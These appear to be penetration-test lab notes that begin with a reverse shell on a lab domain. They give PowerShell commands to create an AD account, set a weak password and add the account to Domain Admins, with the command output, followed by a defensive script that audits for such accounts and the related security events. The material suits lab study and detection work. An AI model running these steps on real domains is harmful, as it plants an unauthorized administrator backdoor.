Windows privilege escalation
init
Once we have a reverse shell, we want to create a user from that shell so that we can access the domain as a domain admin. However, sometimes you might have only the hash of a user and be unable to log in locally with it.
In such a situation, it can be beneficial to create an AD domain user and work with that account instead.
To create the user
PS C:\users\robb.stark\Desktop> New-ADUser adm1n
To check that the user has been created successfully:
PS C:\users\robb.stark\Desktop> Get-ADUser adm1n
DistinguishedName : CN=adm1n,CN=Users,DC=north,DC=sevenkingdoms,DC=local
Enabled : False
GivenName :
Name : adm1n
ObjectClass : user
ObjectGUID : 5b0ef0d9-d90b-40a7-bf41-b61e035f1fa0
SamAccountName : adm1n
SID : S-1-5-21-3140856773-605703633-3835146884-1123
Surname :
UserPrincipalName :
To set the password:
Set-ADAccountPassword -Identity adm1n -NewPassword (ConvertTo-SecureString -AsPlainText "qwert@12345" -Force)
To add the user to the Domain Admins group, then confirm the membership:
Add-ADGroupMember -Identity 'Domain Admins' -Members adm1n
PS C:\users\robb.stark\Desktop> (Get-ADUser adm1n -Properties MemberOf).MemberOf
CN=Domain Admins,CN=Users,DC=north,DC=sevenkingdoms,DC=local
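The sequence above (New-ADUser, Set-ADAccountPassword, Add-ADGroupMember) leaves three distinct traces on the domain controller: a newly created account (note that the Get-ADUser output shows Enabled : False, because New-ADUser creates the account disabled), a password reset, and a new member of Domain Admins. The following script is an added example written for the defending side; it is not part of the original notes. It assumes the ActiveDirectory module is installed, that the account running it can read the domain and the Security log of a DC, and that the baseline list of expected Domain Admins and the 24-hour window are placeholders to be replaced with your own values.

```powershell
# Added example (not from the original notes): audit a domain for the traces that
# creating a user and adding it to 'Domain Admins' leaves behind.
# Assumptions: ActiveDirectory module present; rights to read the domain and the
# DC Security log; $Baseline and $Hours are placeholders for your environment.
param(
    [int]$Hours = 24,
    [string[]]$Baseline = @('Administrator'),   # constructed baseline, replace with yours
    [string]$DomainController = (Get-ADDomainController).HostName
)

Import-Module ActiveDirectory
$since = (Get-Date).AddHours(-$Hours)

# 1. Accounts created inside the window, enabled or not. A disabled account that
#    is already a member of Domain Admins is exactly the state the notes above show.
$newUsers = Get-ADUser -Filter { whenCreated -ge $since } -Properties whenCreated, Enabled, MemberOf |
    Select-Object SamAccountName, whenCreated, Enabled,
        @{ n = 'InDomainAdmins'; e = { [bool]($_.MemberOf -match '^CN=Domain Admins,') } }

# 2. Current (recursive) membership of Domain Admins compared against the baseline.
$admins = Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
    Select-Object -ExpandProperty SamAccountName
$unexpectedAdmins = $admins | Where-Object { $_ -notin $Baseline }

# 3. Security events on the DC for the same window:
#    4720 = user account created, 4724 = password reset attempted,
#    4728 = member added to a security-enabled global group (Domain Admins is one).
#    Field positions differ per event ID, so read EventData by name from the XML.
$filter = @{ LogName = 'Security'; Id = 4720, 4724, 4728; StartTime = $since }
$events = Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        $xml  = [xml]$_.ToXml()
        $data = @{}
        foreach ($n in $xml.Event.EventData.Data) { $data[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Id      = $_.Id
            Subject = $data['SubjectUserName']                       # who did it
            Target  = if ($_.Id -eq 4728) { $data['MemberName'] }    # DN of the added member
                      else { $data['TargetUserName'] }               # account created / reset
            Group   = if ($_.Id -eq 4728) { $data['TargetUserName'] } else { $null }
        }
    }

# Report: anything here deserves a look; a hit in all three sections for the
# same account within minutes is the pattern the notes above would produce.
"=== Accounts created in the last $Hours h ==="
$newUsers | Format-Table -AutoSize
"=== Domain Admins not in baseline ==="
$unexpectedAdmins
"=== 4720 / 4724 / 4728 events on $DomainController ==="
$events | Sort-Object Time | Format-Table -AutoSize
```

Run it from a management host as an account that can read the DC's Security log; scheduling it and forwarding the three event IDs to a SIEM gives the same coverage continuously. The group-membership check uses -Recursive so that an account added through a nested group is still reported.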
We have now created the user adm1n with the password qwert@12345.